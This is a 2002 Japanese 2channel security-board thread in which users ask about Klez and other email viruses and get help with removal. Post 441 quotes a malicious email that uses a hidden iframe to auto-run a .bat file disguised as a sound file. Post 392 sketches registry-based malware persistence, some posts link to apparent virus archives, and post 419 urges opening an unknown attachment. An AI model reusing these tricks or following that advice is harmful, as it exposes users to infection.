
356 :347:02/08/15 21:08
今スキャンディスクっていうのしてきました。以外に早く済みました。
それで話を聞いてもらったみなさんには悪いんですがなんか直ったっぽいです。
本当におさがわせしました。そしてありがとうございました。
347って私でしたね(w

357 :名無しさん@お腹いっぱい。:02/08/15 21:15
ブラクラだったに決定
でもせっかくセキュ板まで来たんだから
フリーでいいからアンチウィルスソフトいれなさい


358 :名無しさん@お腹いっぱい。:02/08/15 22:27
>>356
まあせっかくだから言っておくと、まさかの時に備えてPC内の大切なデータやメール、
使用してるソフトの設定なんかをバックアップしておくといい。CD-RかCD-RW、MOでも
いいし大容量のメディアをなにか持ってるなら今すぐにでも少しづつ作業しておいて。
それから起動ディスクフロッピーも作っておくべ。
ttp://www.microsoft.com/japan/windowsxp/expertzone/tips/august/renken1.asp
ま、たぶんやってくれないと思うけど。(w

359 :名無しさん@お腹いっぱい。:02/08/15 22:39
質問です。

知り合いがどうやらウイルスに引っかかったらしいのですが、、、

症状は
BIOS後にネットワークに接続となってOS(win98)が起動出来なくなった
との事ですが、これだけでウイルスの名前判りますか?

360 :名無しさん@お腹いっぱい。:02/08/15 22:51
>>359
わからん

361 :359:02/08/15 23:20
どうもでした

362 :名無しさん@お腹いっぱい。:02/08/16 00:27
>>361
笑  もっとくわしく書かないとね。

363 :350:02/08/16 06:53
>>353
レスサンクス!
ノートンを入れていますが反応しない物もあると聞いて
不安だったのです。

>個人的にはソフトウェア板でVixは危険ですか?って聞いて
>思いっきり罵倒されて来い、と思う

それもまた一興(W


364 :名無しさん@お腹いっぱい。:02/08/16 15:54
age

365 :初心者:02/08/16 22:40
以下のページでウイルスに感染してしまったようです。
http://sakai.cool.ne.jp/cleopatra4520/res/index.htm
かってにウイルスのある場所にホームページを書き換えられます。
どうすればもとに戻せるでしょうか?

366 :名無しさん@お腹いっぱい。:02/08/16 22:52
>>365
http://securityresponse.symantec.com/region/jp/sarcj/data/v/vbs.moon@mm.html
読め。

367 :365:02/08/17 01:21
>>366
ありがとうございました。
治りました。

368 :名無しさん@お腹いっぱい。:02/08/17 05:43
ウィルス付きのMP3ってどうやって被害を与えるのでしょうか?
普通に聞いてても発症するんですか?


369 :名無しさん@お腹いっぱい。:02/08/17 05:54
mp3ファイルって主に再生する以外に何に使うんだろう?
その主たる使用方法で発症しないとしたら
ウィルス仕込むことに何の意味があるんだろう?

370 :名無しさん@お腹いっぱい。:02/08/17 06:21
>>369
そのレスになんの意味があるんだろう?

371 :名無しさん@お腹いっぱい。:02/08/17 06:39
>>368
http://www.zdnet.co.jp/news/0203/19/e_mp3.html
http://japan.cnet.com/News/2001/Item/010630-3.html?rn

372 :名無しさん@お腹いっぱい。:02/08/17 07:32
>>371
どうも、ありがとう


373 :名無しさん@お腹いっぱい。:02/08/17 10:20
daan   8月13日  火   133kb  Hi,(ぼくのname),questionnaire
ヤフーのメイルBOXにこんなのがあります。クリックすると自分のパソコン壊さ
れますか?どうしても読みたい場合、マンガ喫茶のパソコンを使えば平気なので
しょうか。

374 :名無しさん@お腹いっぱい。:02/08/17 10:28
>>373
開かずに捨てる。
自分のPCじゃないからいいという考えは捨てろ。

375 :名無しさん@お腹いっぱい。:02/08/17 12:31
ダイヤルアップで接続が完了したときにフロッピーを読みにいくように
なってしまいました。
どこに接続しているかは関係ないようです。
ウィルスなんでしょうか?


376 :名無し:02/08/17 13:15
2Chの掲示板見てたら(Macro.src)に
感染しました。ファイルの修復はできないのか誰か教えてー

377 :373、メールヘッダは?:02/08/17 14:14
>>373
メールヘッダを書き込んでくれ!!!!!!!!!!!!!!!!!!

ヤフーはhtmlメールをそのまま開かない。
意図的に添付ファイルを開けば感染。

378 :pe_nimda.e:02/08/17 14:48
昨日の晩からウィルスメールが山ほど送られてます。。。
送信者magagine@health.ne.jp。
1分に1通です。

んで、質問です。
・サーバーが応答しません。って出て6通ずつしかメールを取り出せません。
まだサーバーに何百通(orそれ以上)もメールが溜まっていると考えられる
んですが、6通ずつじみちに取り出すしか方法がないですか?


379 :名無しさん@お腹いっぱい。:02/08/17 15:03
>>378
DLしないでサーバ上で削除すれば。OEだったら知らんけど。
Vectorにも色々あるでしょ。

380 :添付ファイルを”削除”!!!!!!!:02/08/17 15:41
>>378
**通受信中と表示されるはず。

添付ファイルをサーバーで削除にする。

381 :378、メールヘッダを書き込んでくれ:02/08/17 15:43
 

382 :pe_nimda.e:02/08/17 16:08
無知ですみません。自分でも調べているのですが。

サーバー上で削除するってのは自分でできるんですか? プロバイダ(ゼロ)には「削除して欲しい」っていうメールを書きました。
送受信すると12通受信中って出て、7通目でサーバーが応答しなくなります。 その繰り返しです。来ているメールは ・1通目、添付ファイルあり
The original message was received at Fri, 16 Aug 2002 23:44:08 +0900
from tky08-f232.alpha-net.ne.jp [61.205.39.232]
----- The following addresses had permanent fatal errors -----
<fushiki@newsjpmsn.com>
----- Transcript of session follows -----
... while talking to mx07.hotmail.com.:
>>> RCPT To:<journal_opinion@hotmail.com>
<<< 552 Requested action not taken: exceeded storage allocation
554 <fushiki@newsjpmsn.com>... Service unavailable
・2〜5通目はundeliveredの通知
・6通目は
┏━━━━━━━━━━【ご確認下さい】━━━━━━━━━━┓
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
「healthクリック」が提供しております健康情報メールマガジン 「ヘルスケア・マガジン」への退会申し込みをいただきましたが、
ご入力いただいたアドレスは登録されておりませんでした。 転送の設定などをご確認の上、お申し込みいただいているアドレスから
再度解除のお申し込みをいただきますようお願い申し上げます。 なお、ご不明な点は mailto:magazine@health.ne.jp
までお願いします。 ■━━ヘルスケア・マガジン━━━━━━━━━━━━━━━━┓ [編集発行責任者]
株式会社NTTデータ healthクリック事務局 〒135-6033 東京都江東区豊洲3-3-3 豊洲センタービル [お問い合わせ窓口]
mailto:magazine@health.ne.jp ┗━━━━━━━━ Copyright(C) 2000 NTT DATA ━━━━━━■

383 :名無しさん@お腹いっぱい。:02/08/17 16:21
>>382
nPOPで検索してみ。自分で削除出来るよ。

384 :pe_nimda.e:02/08/17 16:28
>382
今からやってみます。ありがとう。

385 :pe_nimda.e:02/08/17 16:55
>382
削除できました。ほんとありがとう。

サーバー上には6通ありました。
あれ?6通しかないのか???と思い、アウトルックで受信してみると、
状況は前と変わらず、6通取り出して応答不能。6通取り出して応答不能。
の繰り返し。
サーバー上の6通を削除してみると、アウトルックでは受信件数0となりました。

つまり、アウトルックで取り出したメールがサーバー上では取り出せていない。
サーバー上に同じメール(6通)が常時滞在し、
アウトルックで受信するたびに同じメールを取り出している。
ってことなのかな

386 :名無しさん@お腹いっぱい:02/08/17 18:13
 はじめまして。
 いきなりですみませんが、今朝方(午前8時ごろ)ネットに接続中、
知らない間に "crackler.exe" というファイルが、c:\windows\temp
上に展開されていました。\temp の下には ナントカ とかいう(名前忘れました)
ディレクトリが作られていて、そのなかに \crackler というフォルダが
作られていました。

 気が付いたのは、PCが異常を感知し、メッセージを表示していたからなんですが、
このファイルはいったい何者なんでしょう。
 怖かったので、EXEファイルと\tempの下のフォルダごと削除しましたが、
今後、どうすればいいでしょうか?

 いちおう、マカフィのウィルス・スキャンを入れているんですが、
ウィルスは駆除できても、不正進入(ハッキング?)にはお手上げなんでしょうか?

 (分かりづらくてすみません。今のところ実害はないです)
よろしくお願いします。

387 :名無しさん@お腹いっぱい。:02/08/17 18:45
そりゃまぁ、
アンチウィルスソフトはパーソナルファイアーウォールじゃないからね・・・

文面からなんとなく
馬鹿フィはPCのプレインストールでウィルス定義は最新かどうか怪しい上に
IEをパッチあてないでつかってて
あまつさえOEを「メールのプレビュー」にチェックしたまま使っている・・・
そんな匂いがするんだが、どう?>>386


388 :名無しさん@お腹いっぱい:02/08/17 19:28
>>387 レスありがとうございます。
    そうですか、マカフィは馬鹿ですか。。。

    ウィルス定義は最新です。
    IEはこのあいだ、WINDOWS UPDATEで更新しました。
    (特に新たにDLする必要なものはないそうです)
    OEは使っていません。ジャストシステムのキャラメルというメーラーを使っています。
    「メールのプレビュー」は機能として付いていません。

    で、ファイアー・ウォールは購入してあって、DLファイルもあるんですけど、
   いちいち、不正アクセスのメッセージを表示してくるので、
   うざったくて、アンインストールしちゃいました。

    で、さきほどここにカキコした後、再度ファイルを展開しようと
   したところ、なぜか1年間の利用料のようなものを支払わないと、
   起動できないようになっちゃってるんですよ。

    むかついたので、FW なしでしばらく様子を見ます。
   どうもでした。m(vv)m

389 :名無しさん@お腹いっぱい。:02/08/17 19:39
>>388
馬鹿フィは使ったことないけど、フリーのFWくらいはいれようよ。

390 :名無しさん@お腹いっぱい。:02/08/17 19:42
この板の流れからいくと、有料なソフトなら
ノートン=バスター>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>馬鹿フィーって感じ
検知率は悪くないんだけどねぇ・・・

んでこの板を見ればフリーで高性能で使い易いPFWはいくつかある
最初はZoneAlarmかOutpostあたりがおすすめ
あとスパイウェア検知ソフトのAd-awareも入れた方がいい

391 :名無しさん@お腹いっぱい。:02/08/17 19:43
スパイウェア検知じゃなくて駆除ですたね・・・

392 :ァハ:02/08/17 19:52
>>むかついたので、FW なしでしばらく様子を見ます。

その手が有ったとわ。。。なかなか高度なソーシャルエンヂニヤリングだ。。

ちか、、デレクトリ掘ってファイルコピーしてレヂストリキーのアノ辺りに起動用値カキコすれば良いだけでしょ??
んなもん、なんでQ2ダイアルプログラム、クリクしただけで読み込まされるかわからんようなヤシが相手ならバグ利用しなくても逝けるベ




393 :名無しさん@お腹いっぱい:02/08/17 20:02
>>389-392 情報ありがとうございます。フリーでfwがあるんですか。
      早速入れてみます。
(馬鹿ふぃとの契約が切れたら、ほかのに変えようかと思います。
 でも、Klezは検知してくれました)

394 :名無しさん@お腹いっぱい。:02/08/17 22:47
クレズに感染し、あちこちにメールを送信してるみたいなので
 メールアドレスを削除し(送受信ができない)、アドレス帳を削除したら
とりあえずは感染メールをばらまかないでしょうか?
 初めて感染して落ち込んでます、アドバイスお願いします。

395 :名無しさん@お腹いっぱい。:02/08/17 23:01
>>394
駆除しろよ・・・
http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.gen@mm.html


396 :名無しさん@お腹いっぱい。:02/08/18 00:40
初歩的な質問ですみません
Outlook Expressを使用しています
バージョンは5.5SP2です
感染しないようプレビューをしないようにしております
知り合いから添付ファイルが届きプロバティ>詳細を見たのですが、
どの部分が添付ファイルの情報なのかわかりません
gogleなどで「添付ファイル プロバティ」などを入力して見るも
見方などが書かれているHPなどが見つかりませんでした
どうか教えていただけませんでしょうか?
もし、自分に届いている情報をこちらに書きこむ際はどの部分を
記載したらよろしいのでしょうか?
合わせてお願い致します

397 :名無しさん@お腹いっぱい。:02/08/18 00:56
みなさんに質問します。
ノートンアンチウイルス使っているのですが
先ほどウイルス警告、コンピューター上でウイルスを検出しました。
ウイルス名MACRO.SRC
ファイルを修復出来ません。ファイルへのアクセスを拒否されました。
一応UPdeteとシマンテックのHP上からも駆除ファイルをダウンロードしたのですが、
2chのスロ板にアクセスするとまた同じ警告が出ます。
初心者なのでどうしたらいいのかわかりません・・・
どうしたら駆除出来るかどなたか教えて頂けませんか?お願いします。

398 :名無しさん@お腹いっぱい。:02/08/18 01:02
>>397

ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/l50


399 :名無しさん@お腹いっぱい。:02/08/18 01:21
>>398
ありがとうでした(^^)安心しました

400 :名無しさん@お腹いっぱい。:02/08/18 02:15
>>396
http://www.infoseek.co.jp/GTitles?qp=0&nh=10&arn=GK0103311010&qt=%A5%D7%A5%ED%A5%D1%A5%C6%A5%A3&col=GK&st=0

401 :名無しさん@お腹いっぱい。:02/08/18 02:57
>>400
ありがとうございます

402 :PC初心者:02/08/18 05:30
以前メール友達だった人物から突然、ウィルスが送られてきました
あやまってそれを開いてしまうと、突然、私のパソコンがメッセージを作成しだして
どうやら30通くらい送ったようです。
そして何時間後かにMail Delivery System で20通ほどかえってきました。
これは、何というウィルスですか?
対処法等 教えてください

403 :名無しさん@お腹いっぱい。:02/08/18 05:49
>>402
それだけで分かる人間いるわけないだろ。
アンチウィルスいれてないならまずは
http://www.trendmicro.co.jp/hcall/index.asp
に行け。
駆除が終わったら
http://pc.2ch.net/test/read.cgi/sec/1027400238/
に行け。
それとOutlookは使うな。
分からん添付ファイルはダブルクリックするな。


404 : :02/08/18 07:03
今日だけで2通もウィルスメール(クレズ)が来たよ〜。こわいよ〜。
送信者の名前も件名も違うし、俺って狙われてるの?
今まで3年間一度もこなかったのに。

で、AVG入れてたので、ウィルスを確認した画面が出てきたのですが、
日本語化してなかったので、ENABLE ACCESS? ときかれて、
YESかNOか、どっちをクリックしていいかわからなかった。
迷っているうち、その画面は自動的に消えたけど、
べつにいいんですよね?

それと、クレズって添付ファイル開かなきゃだいじょうぶなんすよね。


405 :cheshire-cat ◆CATJR.v6 :02/08/18 07:14
>>404
OEなりOutlookでも、パッチ入ってるなら大丈夫。

406 :なめこ!:02/08/18 08:38
いま、怪しいメールが来たんです
NAA01477 <NAA01477@nifty.ne.jp-->

A special nice game

Hi,This is a special nice game
This game is my first work.
You're the first player.
I wish you would like it.

どうでしょう? car[17].jpgというファイルも添付されてきました。

407 :301:02/08/18 09:40
>406
うちに来たのもそれだっ!


408 :名無しさん@お腹いっぱい。:02/08/18 09:48
>>406
http://pc.2ch.net/test/read.cgi/sec/1028559356/556
マルチ

409 :なめこ!:02/08/18 10:02
マルチじゃないっての!
放置だったから、くだらねえにもカキコしただけ

410 :名無しさん@お腹いっぱい。:02/08/18 10:06
>>409
逆ギレかよ。
Klezに6なめこ。

411 :名無しさん@お腹いっぱい。:02/08/18 10:13
それがマルチじゃなかったら何がマルチだ?厨房が
>>1-2
にウィルス検索できるとこリンクされてるだろうがこの糞厨房
放置だと?即レス期待してんじゃねーよタコ厨房
自分で調べろこのケサランパサラン
厨房の相手する方がくだらねぇよ

412 :名無しさん@お腹いっぱい。:02/08/18 10:14
>>411
> 自分で調べろこのケサランパサラン
おもろい

413 :なめこ!:02/08/18 10:16
( ̄ー ̄)ニヤリ

414 :なめこ!:02/08/18 10:18
それがさ、スキャンしても全然かからないんですよ
で、jpgファイルの方は、車の画像が出てきただけ・・それも見覚えのある・・
もう一つファイルがあって、クリックすると、インストールして実行しますか?
と出たので、やめといた

415 :なめこ!:02/08/18 10:21
クレズかなぁ
なんせ、初めてなもんで・・・

416 :名無しさん@お腹いっぱい。:02/08/18 10:21
,,,,.,.,,,,
 ミ・д・ミ <ケサランパサラン!!
  """"


417 :名無しさん@お腹いっぱい。:02/08/18 10:24
>>414
以前届いたエロスクリーンセーバーもそんな感じだったよ。
実行したらもろのロリ画像だった。

418 :なめこ!:02/08/18 10:26
どうすればよいですか?


419 :名無しさん@お腹いっぱい。:02/08/18 10:28
>>418
検出されないなら開いてみたら?多分大丈夫。
エロだったらうpしてね。

420 :名無しさん@お腹いっぱい。:02/08/18 10:29
無視だろ。

421 :名無しさん@お腹いっぱい。:02/08/18 10:30
>>418
結果報告きぼーん

422 :なめこ!:02/08/18 10:34
開いたら、さっきからHDがうなっております

423 :名無しさん@お腹いっぱい。:02/08/18 10:39
初めてウィルスにやられた。。。
クレズHさん・・・。キライ。

424 :名無しさん@お腹いっぱい。:02/08/18 13:30
>>396
遅いけどね。レス400でわかったのかぃ。
ttp://www.chokai.ne.jp/ishigaki/mono28.html#no.1099
↓ここはContent-Typeの説明を読んでね。
ttp://www.puni.net/~mimori/header/

425 :名無しさん@お腹いっぱい。:02/08/18 13:52
396です
>>424
レスを頂いて御礼はしたものの400では分かるはずないです・・・
ハァーーと落ち込みました
424さんに教えていただいたURLで分かりました
本当にありがとうございました

426 :Klez:02/08/18 14:21
Klez
From:lead< lead@mail.okuninet.co.jp >
To: subscribe-consumervenue@torpedomail.com
subscribe-consumervenue@torpedomail.com
Subject:Hi,please try again
Date:**
Received: from [202.248.37.209] by ** with ESMTP id **; **
Received: from Bmnsektby mail501.nifty.com (8.12.4/3.7W-02/25/02)
with SMTP id g7HCklCf001194 for < consumervenue@torpedomail.com >; **
From kantoudaitoku@nifty.com **
Message-Id:< 200208171246_g7HCklCf001194@mail501.nifty.com >

427 :名無しさん@お腹いっぱい。:02/08/18 14:32
友人がウィルスに感染して、仲間内にウィルスメールが届いてます。
その内の一人が「ウィルスバスターしたから大丈夫メール見てみよ」って
そのウィルスメール開こうとしてたらしいんですけど、
バスター通したら(?)無害になって見ても大丈夫になるんですか?
イマイチ意味がわからない・・・。

428 :a:02/08/18 14:44
果たして11歳の少年が大の大人の女を強姦できるか
http://tmp.2ch.net/test/read.cgi/asia/1029428265/429

ウイルス感知されますた。

429 :名無しさん@お腹いっぱい。:02/08/18 16:15
スズメバチ駆除 ビーバスターズ 
 http://ww41.tiki.ne.jp./~mikihiro9649/

430 :名無しさん@お腹いっぱい。:02/08/18 16:22
>>427

感染したファイルからウイルスを駆除したという意味かな?
で、どうしてまた開きたいの?


431 :7:02/08/18 20:22
http://211.134.114.148/uirusu.zip
oo

432 :a:02/08/18 20:28
a

433 :名無しさん@お腹いっぱい。:02/08/18 21:09
>>430
本人に聞いたところ、メール受信の時にノートンが反応して検疫したと言っておりました。
なんでそれが「バスターした」という言葉につながるのか謎・・・。
検疫したからメールからウィルスは駆除されていると思ってるみたいです。
何故開きたかったのかはよく分かりません、怖いです。

434 :こっこ:02/08/18 21:11
ウイルススキャンに引っかからなくても
感染してることありますか?

435 :名無しさん@お腹いっぱい。:02/08/18 21:18
>>433
検疫 == 感染したファイルが隔離された
ゆえに削除はされていない。特定の場所に保管されている。
どうしても調べたいのならバイナリエディタで開いてごらん。
つーか、開いても大したことは得られないと思うよ。

436 :名無しさん@お腹いっぱい。:02/08/18 21:20
先月のふれぜむはウィルス定義対応前に感染しちまった

437 :cheshire-cat ◆CATJR.v6 :02/08/18 21:22
>>436
変種が一度にたくさん一気に出たからね。

438 :名無しさん@お腹いっぱい。:02/08/18 21:45
>>434
なぜパターン更新が重要か分かりますか?

439 :ちびた:02/08/18 21:51
覚えている方はいないかもしれませんが、
スクロールの件、なおりました。
原因は、マウス不良でした。
おさわがせしました。

440 :cheshire-cat ◆CATJR.v6 :02/08/18 21:52
>ちびたたん
乙。

441 :名無しさん@お腹いっぱい。:02/08/18 21:57
これって何のウィルスですか?
件名は何も無く、Return-Path、From共、人の名前だけど、どちらも心当たり無し。
comdesignsで検索したけど、出ませんでした。
ウィルス名と誰からかを知りたかったんですけど・・・

Return-Path: <*****@comdesigns.co.jp>
Delivered-To: *****@*****.ne.jp
Received: (qmail 27724 invoked from network); 18 Aug 2002 20:14:50 +0900
Received: from unknown (HELO comdesigns.co.jp) (210.154.34.34)
by tp01001 with SMTP; 18 Aug 2002 20:14:50 +0900
Received: from Onwhate [218.222.59.254] by comdesigns.co.jp
(SMTPD32-6.04) id A0F04100F2; Sun, 18 Aug 2002 20:11:44 +0900
From: ***** <*****@d1.dion.ne.jp>
To: *****@*****.ne.jp
Subject:
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=T24W3lHyh911Hc79W5uSZ200L0x2z858sLy5F
Message-Id: <200208182011562.SM01296@Onwhate>
Date: Sun, 18 Aug 2002 20:15:39 +0900
--T24W3lHyh911Hc79W5uSZ200L0x2z858sLy5F
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY>
<iframe src=3Dcid:Mo657CEQM336iDh63 height=3D0 width=3D0>
</iframe>
<FONT></FONT></BODY></HTML>
--T24W3lHyh911Hc79W5uSZ200L0x2z858sLy5F
Content-Type: audio/x-midi;
name=横書きIDX.bat
Content-Transfer-Encoding: base64
Content-ID: <Mo657CEQM336iDh63>

442 :cheshire-cat ◆CATJR.v6 :02/08/18 22:02
>>441
件名やファイル名や添付ファイル名のみでウイルスを同定できる時代は、終わっとります。
何かアンチウイルスソフト使ってスキャンしたらどうでしょ。

443 :名無しさん@お腹いっぱい。:02/08/18 22:09
何にも入れてないならAVPEぐらいいれとき

444 :441:02/08/18 22:21
>>442-443
PCがかなりボロイので、新しいソフト入れると(特に高機能高性能ソフト)
おかしくなっちゃうから、アンチウィルスも我慢してる状態です。
その分気を付けて、今迄メールウィルスは100通以上は来たけど
今の所は開いてないので、新しいPC買うまでもう少し粘ろうかと・・・
(一応プロパティ見た後、オンラインチェックしていますが)

だいたい件名等から調べたてけど、これは無かったので聞いてみました。
これだけじゃ判らないんですね。
どうもでした。

445 :名無しさん@お腹いっぱい。:02/08/18 22:24
>>435
ありがとうございます、隔離されてるだけだと言っておきます。
実はこのウィルスメールは自分の所にも届いてるんですが
うちのノートンは無反応です・・・どうして。

446 :cheshire-cat ◆CATJR.v6 :02/08/18 22:27
>>444
スキャンの動作が重いんで時間かかるけど。
インスコしないで利用できる、Antidote 簡易版とか。
http://www.vintage-solutions.com/Japanese/Antivirus/Super/
ウイルスの処理はできないけど、ウイルス名を知るだけの目的ならどうぞ。

447 :444:02/08/18 22:40
>>446
ありがとございます〜。
さっそく見てみました。
これなら何とか使えると思います。
感染してなくても、メール添付の時点で判るのかな?
早く次のウィルス来ないかな〜。(ワクワクドキドキ

448 :cheshire-cat ◆CATJR.v6 :02/08/18 22:42
>>447
>メール添付の時点で判るのかな
リアルタイムスキャンはできませぬ。
だもので、ウイルス名を知るためには、受信後に毎回手動でスキャンする必要がありまする。

449 :名無しさん@お腹いっぱい。:02/08/18 22:49
ウイルス欲しいのならメアド晒せば?

450 :名無しさん@お腹いっぱい。:02/08/18 22:55
pen133Mhzメモリ16MBのノートでもAVPE動いてますが何か?



常駐はダメぽ・・・

451 : :02/08/18 22:57
>>441
klezじゃない?
添付ファイルをデスクトップとかに移さないと検知できないこともある。

452 :名無しさん@お腹いっぱい。:02/08/18 23:01
当方Win2000なのですが、WinNT以外のディレクトリを対象に
全HDDドライブでファイルだけがきれいになくなってしまった。
ディレクトリは残っていますが、当然のごとく0バイト。
AVGを入れてましたが、特にチェッカーしたような挙動は
感じられず。
これってウイルスの仕業なのか?

453 :404:02/08/18 23:27
うげ、今日だけで3つ目のウィルスメールが来たー。
名前も件名も全て違う。
件名は、「Re:look my girl friend 」「how are you」「A IE6.0patch」
名前は1個目は忘れたけど、あとは「hymmt」「trash」

すごくしつこい。


454 :メールヘッダは?:02/08/18 23:35
 

455 :名無しさん@お腹いっぱい。:02/08/19 00:05
>>452
http://pc.2ch.net/test/read.cgi/sec/1024943662/l50
↑の可能性あり。

456 :名無しさん@お腹いっぱい。:02/08/19 01:51
今日だけでウィルスメールと思われる物が5通来ました
メールのソースを見たら5つともアルファベットのAなど
とてつもない数が羅列してありました。


457 :名無しさん@お腹いっぱい。:02/08/19 01:58
>>456
報告は別にしなくて良い。

458 :報告したい444:02/08/19 05:43
>>446
ANTIDOTEの簡易版、説明見ながらやってみました。
最初に、Cドライブのコード解析でチェックしたところ
「ウィルス感染を検出!」なんてダイヤログが出て一瞬焦ったら
感染ファイルは0だったけど、プロパティをコピペしたメモ帳が
懐疑ファイルになってました。(ホッ…
削除したウィルスメールを再受信してやってみたら
コード解析では出なかったけど、電子メール確認で感染ファイルとして
>>451さんのおっしゃる通り、Klez-hと出ました。
いつも関連ページで、件名や添付ファイルから調べていましたが
必ずしも当てはまるわけでは無いのですね。

おまけに\Helpdesk\SFCの中に、5個の不良ファイルが見つかってしまい
ちょっと鬱ですが・・・
ノートンやウィルスバスター入れてるのに感染しまくってる友人達が居る為
(中には何度もとか、一人で50通位送って来るヤツとか居るし・・・)
今後も感染しない様に気を付けます。どうもでした!

459 :名無しさん@お腹いっぱい。:02/08/19 09:34
ノートンやウイルスバスター入れてるのに感染しまくってる友人達と縁を切れ。

460 :名無しさん@お腹いっぱい。:02/08/19 22:32
JS.Winbomb.dウイルスはどういうものですか?
ノートンで検出されたのですが・・・。

461 :名無しさん@お腹いっぱい。:02/08/19 22:39
>>460
http://securityresponse.symantec.com/avcenter/venc/data/js.winbomb.d.html
検索しろ

462 :名無しさん@お腹いっぱい。:02/08/19 22:43
Johann Strauss型ウィンドウズ爆破ウィルスD変異株



・・・ではない

463 :KlezH:02/08/19 23:50
KlezH
Received: from smtp01.asahi-it.com (EHLO smtp.asahi-it.com)
(210.174.168.200) by ** with SMTP; **
Received: from Mtrkxip (pee7b3c.kngwnt01.ap.so-net.ne.jp [202.238.123.60])
by smtp.asahi-it.com (8.11.1/3.7W) with SMTP id g7J9xUm82295
for < eli_net_209_63_64_217_torpedomail_com@eli.net >; **
Date:**
Message-Id:< 200208190959_g7J9xUm82295@aitstaff.asahi-it.com >
From:postmaster< postmaster@aitstaff.asahi-it.com >
To: 200208171246_g7HCklCf001194@mail501.nifty.com
200208190959_g7J9xUm82295@aitstaff.asahi-it.com
pee7b3c_kngwnt01_ap_so-net_ne_jp@aitstaff.asahi-it.com
202_238_123_60@aitstaff.asahi-it.com
smtp_asahi-it_com_202_238_123_60@mxin1.so-net.ne.jp
210_174_168_200_pee7b3c_kngwnt01_ap_so-net_ne_jp@mxin1.so-net.ne.jp
対策せよ!!!!!!!!!!!!!!!!!!!!!!!
Subject:Undeliverable mail--"楙楙蒂栗・衄¬吐柁#34;

The following mail can't be sent to kanagawa@mycom.co.jp:
From: consumervenue@torpedomail.com
To: kanagawa@mycom.co.jp
Subject: まだまだありますが書ききれないので随時追加
The attachment is the original mail
-------------
添付ファイルは、
http://www.h2.dion.ne.jp/~obecchi/combo.htm
http://www.h2.dion.ne.jp/~obecchi/
http://mkg.uic.to/mkgu/obecchii.html
役立つコンボ集
カ−ドゲ−ムの醍醐味といえばやっぱりコンボ!
ここでは基本的・実用的なコンボを随時発表していこうと思います。

464 : :02/08/20 09:48
West Nile Virusが猛威を振るっているらしいです。

465 :名無しさん@お腹いっぱい。:02/08/21 22:12
アドレス → inet <inet@microsoft.com>
件  名 → Fw:your password
添付ファイル → align.bat, roadstar_mazda-thumb-1028712269[1].jpg

これって何てウイルスなんですか?

466 :名無しさん@お腹いっぱい。:02/08/21 22:23
>>465
まずklezだろうけど>>442に同じ。

467 :メールヘッダは?:02/08/21 23:23
>>465


468 :おすぅえて:02/08/21 23:50
VBS.Internalっていうウイルスをもらっちゃいました。どんな影響が出て
くるのでしょうか?ファイルの削除だけでよいのでしょうか

469 : :02/08/21 23:52
>>468
お前は1週間後に死ぬ

470 :おすぅえて:02/08/21 23:53
あ〜〜、そ〜なんですかぁ…

471 :名無しさん@お腹いっぱい。:02/08/22 05:06
Windows98SEの人に、ちょっと聞きたいのですが
C:\windows\Asdapi.exe
C:\windows\ramsys.exe ってファイルがアンチウィルスにひっかかったんですが
この2個のファイルあります?
よかったら確認してほしいのですが

472 :471:02/08/22 05:39
すいません
win板逝きます

473 :名無しさん@お腹いっぱい。:02/08/22 09:47
>>471
トロイ関連。
ttp://securityresponse.symantec.com/avcenter/venc/data/backdoor.cabro.html
ttp://securityresponse.symantec.com/avcenter/venc/data/trojan.sheehy.html

474 :名無しさん@お腹いっぱい。:02/08/23 00:34
クレイズHがPCの中に入ってきたらしいのですが
ウイルススキャンで出てきたファイルを消そうとしても消せません
どうやって消したらよいのでしょうか?

475 :名無しさん@お腹いっぱい。:02/08/23 00:38
状況がさっぱりわからん
説明書見たほうがはやいんとちがう?

476 :474:02/08/23 00:55
説明がおおざっぱすきましたね。。。
っというか、クレイズじゃなくてクレズですね。きっと。。。

ウイルスバスターのHPには、手動で消すように書いてありました。

ウイルススキャンで出てきたファイルをエクスプローラで消そうとすると
「送り側のファイルが使用中の可能性があります」ってなります。



477 :名無しさん@お腹いっぱい。:02/08/23 01:10
>>476
ちみだいじょうび?
ファイル名は?たぶんセーフモードで立ち上げて削除できるから。
セーフモードって?とは言わないよね。

478 :名無しさん@お腹いっぱい。:02/08/23 01:12
>>476
てか、質問者はOSとか詳しい情報を最初に書いてくれ。
ファイルのPathも。

479 :名無しさん@お腹いっぱい。:02/08/23 01:19
PC1台しかないならシマンテックの駆除ツールつかったほうが良さげ

http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.removal.tool.html

480 :名無しさん@お腹いっぱい。:02/08/23 01:47
OSはWindowsMeです。

ファイルはこの二つです
c:\_RESTORE\ARCHIVE\FS1869.CAB
c:\_RESTORE\ARCHIVE\FS1692.CAB

セーフモードでも2回やってみたのですがだめでした。


>>479さんので消してみます!!

481 :名無しさん@お腹いっぱい。:02/08/23 01:51
RESTOREフォルダにウィルスがあるなら
そのページの説明と

_RESTORE フォルダにウィルスが発見された場合の対応方法について
http://support.microsoft.com/default.aspx?scid=http%3a%2f%2fwww.microsoft.com%2fJAPAN%2fsupport%2fkb%2farticles%2fjp263%2f4%2f55.asp


これもきちんと読んでね

482 :名無しさん@お腹いっぱい。:02/08/23 02:18
>>481さんのリンク先の説明通りにやったら消すことができました!!

レスしてくれた方ありがとうございます!!!

483 :名無しさん@お腹いっぱい。:02/08/23 02:23
>>482
お金あるならノートンかウィルスバスター
ないならAVGくらいいれたほうが良かれ

484 :あぼーん:あぼーん
あぼーん

485 :_:02/08/23 13:59
>>484は他人のアドレスを晒しているから誰も送っちゃイカンよ

486 :名無しさん@お腹いっぱい。:02/08/23 14:00
ほい

ttp://lounge.dip.jp/~yoshinoya_off/up/img/whismng.zip

487 :あぼーん:あぼーん
あぼーん

488 :名無しさん@お腹いっぱい。:02/08/23 15:23
484が使っているのは6年前のDr. Solomon

489 :名無しさん@お腹いっぱい。:02/08/23 15:41
ハイテク犯罪で逮捕されると、pcを押収され、技官が中を
徹底調査するそうですが、この場合削除したファイルとかも
復活させられるんだろうか。
こーゆー場合、ハードディスクをフォーマットしとかんといかんのだろうか。


490 :名無しさん@お腹いっぱい。:02/08/23 15:43
>>489 逮捕されるようなことやったんですか?

491 :名無しさん@お腹いっぱい。:02/08/23 15:44
